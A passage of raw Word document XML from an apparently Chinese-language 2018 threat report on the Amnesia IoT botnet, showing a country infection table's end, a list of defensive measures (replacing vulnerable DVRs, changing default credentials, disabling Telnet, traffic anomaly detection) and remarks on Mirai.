              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D90015">
              <w:t>Iran</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1965</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00D90015" w:rsidTr="00480294">
        <w:trPr>
          <w:cnfStyle w:val="010000000000" w:firstRow="0" w:lastRow="1"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42" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00D90015" w:rsidRDefault="00FF572C" w:rsidP="00480294">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D90015">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>20.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00D90015" w:rsidRDefault="00FF572C" w:rsidP="00480294">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:cnfStyle w:val="010000000000" w:firstRow="0" w:lastRow="1" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D90015">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Argentina</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00D90015" w:rsidRDefault="00FF572C" w:rsidP="00480294">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D90015">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>1748</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="000025BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="四技术分析及预测"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="007A375D">
        <w:t>四、</w:t>
      </w:r>
      <w:r w:rsidR="00971434">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>防护方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003139FE" w:rsidRDefault="003139FE" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>僵尸网络</w:t>
      </w:r>
      <w:r w:rsidR="00A17488">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的特点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，最好</w:t>
      </w:r>
      <w:r w:rsidR="00A17488">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的防护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>办法莫过于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07276" w:rsidRDefault="003139FE" w:rsidP="00F07276">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>更换存在远程代码执行漏洞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DVR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设备；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003071B5" w:rsidRDefault="003071B5" w:rsidP="00F07276">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修改设备的出厂默认凭据</w:t>
      </w:r>
      <w:r w:rsidR="00431992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003071B5" w:rsidRDefault="003071B5" w:rsidP="003071B5">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>访问设备</w:t>
      </w:r>
      <w:r w:rsidR="00431992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003071B5" w:rsidRDefault="003071B5" w:rsidP="003071B5">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络行为分析可检测流量异常，结合自动签名生成进行防护</w:t>
      </w:r>
      <w:r w:rsidR="00431992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003071B5" w:rsidRDefault="003071B5" w:rsidP="003071B5">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>企业行为分析（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UEBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）在早期发现细粒度的流量异常</w:t>
      </w:r>
      <w:r w:rsidR="00431992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003071B5" w:rsidRDefault="003071B5" w:rsidP="003071B5">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入侵防护系统应阻断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>默认凭据或重置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>连接。使用签名检测已提供的命令序列</w:t>
      </w:r>
      <w:r w:rsidR="00431992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00674011" w:rsidRDefault="00674011" w:rsidP="00674011">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>随着越来越多的物联网设备连接至互联网，那些不安全的物联网设备正在成为威胁实施者眼中唾手可得并可轻松利用的成熟果实。正如臭名昭著的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Mirai </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>僵尸网络，针对网络摄像头和家庭路由器等设备中的登录漏洞进行攻击利用，发起了迄今</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>为止已知的规模最大的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击。如果物联网设备制造商不能确保其设</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>备的绝对安全，对数字经济的潜在影响将是毁灭性的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00674011" w:rsidRPr="00674011" w:rsidRDefault="00674011" w:rsidP="00674011">
      <w:pPr>
        <w:ind w:left="480" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00674011" w:rsidRPr="00674011" w:rsidSect="0026693D">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60B" w:rsidRDefault="0035160B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0035160B" w:rsidRDefault="0035160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60B" w:rsidRDefault="0035160B">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0035160B" w:rsidRDefault="0035160B">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0D25E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637E32D4"/>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A261DDA"/>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44A0FC26"/>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027462E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AD1A345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875E90F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DC180A9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ACDAC52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E812BAB2"/>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3408958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4195375"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5FCCBD0"/>
    <w:lvl w:ilvl="0" w:tplc="FAA2B5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92E4A61"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACCA6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C3E22CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE6A3E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3"/>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25BD"/>
    <w:rsid w:val="00011C8B"/>
    <w:rsid w:val="00024F36"/>
    <w:rsid w:val="00037ACD"/>
    <w:rsid w:val="00054DF3"/>
    <w:rsid w:val="000E7B4C"/>
    <w:rsid w:val="00146371"/>
    <w:rsid w:val="00163C1A"/>
    <w:rsid w:val="00165F60"/>
    <w:rsid w:val="001B2B26"/>
    <w:rsid w:val="002453F0"/>
    <w:rsid w:val="0026693D"/>
    <w:rsid w:val="00301C77"/>
    <w:rsid w:val="00303982"/>
    <w:rsid w:val="003071B5"/>
    <w:rsid w:val="003139FE"/>
    <w:rsid w:val="00344924"/>
    <w:rsid w:val="0035160B"/>
    <w:rsid w:val="003717C1"/>
    <w:rsid w:val="003737A1"/>
    <w:rsid w:val="00382EB8"/>
    <w:rsid w:val="003D3F7B"/>
    <w:rsid w:val="00425192"/>
    <w:rsid w:val="00431992"/>
    <w:rsid w:val="00480294"/>
    <w:rsid w:val="004E29B3"/>
    <w:rsid w:val="00504125"/>
    <w:rsid w:val="00512409"/>
    <w:rsid w:val="0053738D"/>
    <w:rsid w:val="00590D07"/>
    <w:rsid w:val="005965AD"/>
    <w:rsid w:val="005A1945"/>
    <w:rsid w:val="005A6FB9"/>
    <w:rsid w:val="005D48F4"/>
    <w:rsid w:val="005F30B6"/>
    <w:rsid w:val="006140CA"/>
    <w:rsid w:val="006665FE"/>
    <w:rsid w:val="00674011"/>
    <w:rsid w:val="00724B4F"/>
    <w:rsid w:val="00743949"/>
    <w:rsid w:val="00784D58"/>
    <w:rsid w:val="007A375D"/>
    <w:rsid w:val="007F5DDA"/>
    <w:rsid w:val="00801E05"/>
    <w:rsid w:val="0086328F"/>
    <w:rsid w:val="00890DAD"/>
    <w:rsid w:val="008B67B9"/>
    <w:rsid w:val="008D6863"/>
    <w:rsid w:val="00902331"/>
    <w:rsid w:val="00934A03"/>
    <w:rsid w:val="00971434"/>
    <w:rsid w:val="00981F59"/>
    <w:rsid w:val="00A17488"/>
    <w:rsid w:val="00A97693"/>
    <w:rsid w:val="00B54F91"/>
    <w:rsid w:val="00B86B75"/>
    <w:rsid w:val="00B92C28"/>
    <w:rsid w:val="00BC48D5"/>
    <w:rsid w:val="00BD7086"/>
    <w:rsid w:val="00C002B2"/>
    <w:rsid w:val="00C36279"/>
    <w:rsid w:val="00C46CE5"/>
    <w:rsid w:val="00C73353"/>
    <w:rsid w:val="00C75D60"/>
    <w:rsid w:val="00C86554"/>
    <w:rsid w:val="00D01F61"/>
    <w:rsid w:val="00D27315"/>
    <w:rsid w:val="00D60447"/>
    <w:rsid w:val="00D66503"/>
    <w:rsid w:val="00D7654E"/>
    <w:rsid w:val="00D83C13"/>
    <w:rsid w:val="00D90015"/>
    <w:rsid w:val="00DA7FE8"/>
    <w:rsid w:val="00DC756E"/>
    <w:rsid w:val="00DD51CD"/>
    <w:rsid w:val="00E16F52"/>
    <w:rsid w:val="00E315A3"/>
    <w:rsid w:val="00E31981"/>
    <w:rsid w:val="00E54939"/>
    <w:rsid w:val="00E5664F"/>
    <w:rsid w:val="00E90932"/>
    <w:rsid w:val="00F07276"/>
    <w:rsid w:val="00F750F6"/>
    <w:rsid w:val="00FF572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851F"/>
  <w15:docId w15:val="{DAC57040-D1B2-4226-893E-72B71825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A7FE8"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="500" w:lineRule="exact"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E5664F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines="100" w:after="100"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="44"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00301C77"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:afterLines="100" w:after="100"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="center"/>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1B2B26"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C002B2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLineChars="0" w:firstLine="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480294"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>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30">
    <w:name w:val="Plain Table 3"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00D6650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Plain Table 1"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00D6650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
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00C733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1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00504125"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="正文文本 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a0"/>
    <w:rsid w:val="00C46CE5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="003139F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614</Words>
  <Characters>3504</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>29</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Tyler</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-05T02:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-05T07:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>